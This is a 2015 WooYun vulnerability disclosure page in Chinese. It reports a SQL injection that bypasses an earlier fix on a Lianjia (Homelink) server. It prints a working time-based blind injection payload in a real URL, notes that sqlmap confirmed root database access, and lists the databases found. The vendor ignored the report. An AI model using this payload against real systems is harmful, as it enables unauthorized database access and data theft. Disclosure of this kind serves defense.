当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0164838

漏洞标题:链家某站点注入(绕过修复)

相关厂商:链家网

漏洞作者: 路人甲

提交时间:2015-12-26 19:22

修复时间:2015-12-31 19:24

公开时间:2015-12-31 19:24

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-12-26: 细节已通知厂商并且等待厂商处理中
2015-12-31: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

我感觉链家只是确认了然后就完了
等着公开就变成马场了
鸟哥的一口老血

详细说明:

刚刚才看这个洞

 WooYun: 链家某系统弱口令+SQL注入(三万余经纪人账户泄露) 


其实这个不登录就能注入
而且直接访问有还自带数据泄露属性我也是醉了

QQ截图20151226015740.png


试了下还有盲注

http://bxapp.homelink.com.cn:1010/kc/servlet/kcServlet?action=player&method=list&searchKey=1' AND (SELECT * FROM (SELECT(SLEEP(1)))asda) AND '1'='1


sqlmap跑一下

QQ截图20151226014641.png


root权限
竟然还不把权限放低我也是醉了
这修复的醉醉的

QQ截图20151226015644.png


available databases [4]:
[*] information_schema
[*] kc
[*] mysql
[*] test

漏洞证明:

刚刚才看这个洞

 WooYun: 链家某系统弱口令+SQL注入(三万余经纪人账户泄露) 


其实这个不登录就能注入
而且直接访问有还自带数据泄露属性我也是醉了

QQ截图20151226015740.png


试了下还有盲注

http://bxapp.homelink.com.cn:1010/kc/servlet/kcServlet?action=player&method=list&searchKey=1' AND (SELECT * FROM (SELECT(SLEEP(1)))asda) AND '1'='1


sqlmap跑一下

QQ截图20151226014641.png


root权限
竟然还不把权限放低我也是醉了
这修复的醉醉的

QQ截图20151226015644.png


available databases [4]:
[*] information_schema
[*] kc
[*] mysql
[*] test

修复方案:

要是我就不用root运行
权限设置
过滤
排查内网,估计惨惨了

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-12-31 19:24

厂商回复:

漏洞Rank:4 (WooYun评价)

最新状态:

暂无